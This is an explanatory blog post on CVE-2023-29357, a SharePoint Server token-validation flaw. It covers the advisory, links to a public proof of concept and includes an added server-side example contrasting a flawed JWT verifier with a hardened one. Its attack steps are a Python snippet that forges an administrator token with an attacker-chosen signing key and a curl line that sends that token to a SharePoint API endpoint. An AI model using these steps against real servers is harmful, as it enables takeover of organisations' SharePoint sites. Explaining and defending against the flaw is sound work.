CVE-2023-29357 - Inside the Microsoft SharePoint Server Elevation of Privilege Vulnerability
In June 2023, Microsoft patched a critical flaw tracked as CVE-2023-29357 affecting SharePoint Server. This vulnerability was so serious that Microsoft gave it a CVSS (severity) score of 9.8 out of 10, meaning it's about as bad as things can get for enterprise software. Attackers could use it for _elevation of privilege_, granting themselves powerful permissions on a SharePoint site—often enough to fully take over and move deeper into networks.
In this post, we’ll break down CVE-2023-29357 in straightforward American English, show simple code snippets to help you understand the bug, share links to official documentation, and explain how an attacker could exploit it.
Fixed in: June 2023 Patch Tuesday update.
Microsoft’s official advisory:
Microsoft Security Response Center: CVE-2023-29357
Why Is It Dangerous?
SharePoint is often a critical part of business infrastructure. Anyone who can escalate their privileges on SharePoint can grab sensitive documents, tamper with files, or pivot to other systems within a corporate network.
The core mistake: SharePoint did not properly validate tokens used to authenticate users. In some cases, this let attackers bypass authentication and assume the identity of any user, even administrators.
The Technical Details (Simplified)
At the heart of CVE-2023-29357 is a bug in JSON Web Token (JWT) and access token validation—the code didn’t ensure tokens were truly issued by legitimate trusted sources.
1. SharePoint Uses Access Tokens
SharePoint uses signed tokens (think of them like digital hall passes) to verify that a user is who they claim to be.
These tokens are signed using cryptographic keys known only to the server—so only the server should be able to make a real token.
Example (simplified access token)
{
  "alg": "RS256",
  "typ": "JWT",
  "kid": "trusted-key-id"
}
.
{
  "upn": "admin@domain.com",
  "role": "Administrator"
}
.
[signature]
2. The Vulnerability
Instead of firmly checking whether the token was signed by a trusted authority, SharePoint would sometimes accept the request if the token merely _looked_ legitimate, without verifying that the signing key was one of its own trusted keys.
How is this possible?
Certain endpoints in SharePoint didn’t require that the key used to sign the JWT mapped to SharePoint’s trusted internal issuers. This could let an attacker _choose their own public/private key pair_, add that public key’s ID to the token header (kid), and SharePoint would use the attacker’s key to verify the JWT.
Code snippet for malicious token generation (Python + PyJWT)
import jwt
private_key = """-----BEGIN RSA PRIVATE KEY-----
... attacker’s key ...
-----END RSA PRIVATE KEY-----"""
# Make the payload say “I'm an admin!”
payload = {
"upn": "admin@domain.com",
"role": "Administrator"
}
# Custom header, attacker-chosen Key ID
headers = {
"kid": "attacker-key-id"
}
token = jwt.encode(payload, private_key, algorithm="RS256", headers=headers)
print(token)
The attacker sends this token in an Authorization header to the SharePoint endpoint.
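To make the validation flaw concrete from the server's side, here is an added example (not SharePoint's code and not from the original post). It contrasts a verifier that resolves the signing key purely from the token's own kid header, across every key the server happens to know, with a hardened verifier that consults only the trusted issuer's key set and also checks alg, iss, aud and exp before trusting any claim. It uses HS256 with the Python standard library instead of RS256/PyJWT so it runs without dependencies; the key bytes, issuer URL, audience string, user names and kid values are constructed placeholders, and the same key-lookup mistake applies to an RS256 public-key table.

```python
import base64
import hashlib
import hmac
import json
import time

# --- minimal JWT helpers (HS256 only, standard library) ---------------------

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def mint_token(payload: dict, key: bytes, kid: str) -> str:
    """Create an HS256 JWT with the given kid. Used for the legitimate issuer
    and, in the negative test, for a token signed with a key outside the
    trusted set."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = (
        _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)

def _split(token: str):
    """Return (header, payload, signature bytes, signing input)."""
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p)), _b64url_decode(s), h + "." + p

# --- constructed key material (placeholders, not real SharePoint keys) ------

TRUSTED_ISSUER = "https://sharepoint.example.local"   # assumed issuer name
TRUSTED_KEYS = {"trusted-key-id": b"server-secret-known-only-to-sharepoint"}

# Keys the server also "knows about" (e.g. registered through some external
# trust or discovery path) but that are NOT bound to the trusted issuer.
OTHER_KNOWN_KEYS = {"attacker-key-id": b"key-chosen-by-someone-else"}

# --- the vulnerable pattern --------------------------------------------------

def verify_flawed(token: str):
    """Resolves the verification key from the untrusted 'kid' header across
    every known key, with no check that the key belongs to the trusted issuer.
    Whoever controls a key in the lookup table controls who is 'admin'."""
    header, payload, sig, signing_input = _split(token)
    key = {**TRUSTED_KEYS, **OTHER_KNOWN_KEYS}.get(header.get("kid"))
    if key is None:
        return None
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return payload if hmac.compare_digest(expected, sig) else None

# --- the hardened pattern ----------------------------------------------------

def verify_hardened(token: str, expected_aud: str, now=None):
    """Pin the algorithm, look 'kid' up only in the trusted issuer's key set,
    verify the signature, then validate iss/aud/exp before returning claims."""
    header, payload, sig, signing_input = _split(token)
    if header.get("alg") != "HS256":
        return None                      # never let the token pick the algorithm
    key = TRUSTED_KEYS.get(header.get("kid"))
    if key is None:
        return None                      # unknown or untrusted key id
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    now = time.time() if now is None else now
    if payload.get("iss") != TRUSTED_ISSUER or payload.get("aud") != expected_aud:
        return None
    if payload.get("exp", 0) <= now:
        return None
    return payload

def principal_from_authorization_header(value: str, expected_aud: str, now=None):
    """Takes the raw 'Authorization: Bearer <token>' value as it arrives at the
    endpoint and returns the verified upn, or None if the token is rejected."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "bearer" or not token.strip():
        return None
    claims = verify_hardened(token.strip(), expected_aud, now)
    return claims["upn"] if claims else None

if __name__ == "__main__":
    now = time.time()
    base = {"iss": TRUSTED_ISSUER, "aud": "sharepoint-api", "exp": now + 600}
    legit = mint_token({**base, "upn": "alice@domain.com", "role": "Member"},
                       TRUSTED_KEYS["trusted-key-id"], "trusted-key-id")
    outside = mint_token({**base, "upn": "admin@domain.com", "role": "Administrator"},
                         OTHER_KNOWN_KEYS["attacker-key-id"], "attacker-key-id")
    print("flawed verifier on outside-key token:", verify_flawed(outside))
    print("hardened verifier on outside-key token:", verify_hardened(outside, "sharepoint-api", now))
    print("hardened verifier on legitimate token:", principal_from_authorization_header("Bearer " + legit, "sharepoint-api", now))
```

The important design choice is that verify_hardened never lets the token decide which key store to consult: kid is only an index into the issuer's own key set, the algorithm is fixed by the server, and the signature check is followed by issuer, audience and expiry checks. A token whose kid names any other key, however validly it is signed under that key, is rejected before any claim such as upn or role is read.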
Exploitation in the Real World
- _No authentication needed_: The attacker only needs network access to the SharePoint server (usually by being on the same network/VPN).
- _Impact_: Attackers gain admin rights, can perform remote code execution, exfiltrate documents, or use SharePoint as a jumping-off point into the internal network.
Proof-of-Concept (PoC)
Security researchers released tools to automate this attack. For instance, the well-known researcher @Glasnt summarized the research, and full writeups were released by Yuki Chen.
Full technical writeup:
https://medium.com/@yuki_chen/cve-2023-29357-and-sharepoint-security-mitigations-103f8bb10813
PoC:
https://github.com/Chocapikk/CVE-2023-29357
Example: sending a forged token with curl
curl -k -H 'Authorization: Bearer <malicious_token>' https://vulnerable-sharepoint-server/_api/web
Patch NOW! The official fix is in the June 2023 cumulative update for SharePoint.
- Microsoft advisory and patch download
Final Thoughts
Every year, software as popular as SharePoint gets hammered by hackers looking for mistakes like CVE-2023-29357. When such a simple validation issue is discovered, attackers jump in fast with real-world exploits. If you haven’t patched your SharePoint Servers since June 2023, you’re at very high risk.
For further reading
- Microsoft Security Advisory CVE-2023-29357
- Yuki Chen’s Technical Blog Post
- NVD National Vulnerability Database
Timeline
Published on: 06/14/2023 00:15:00 UTC
Last modified on: 06/14/2023 03:37:00 UTC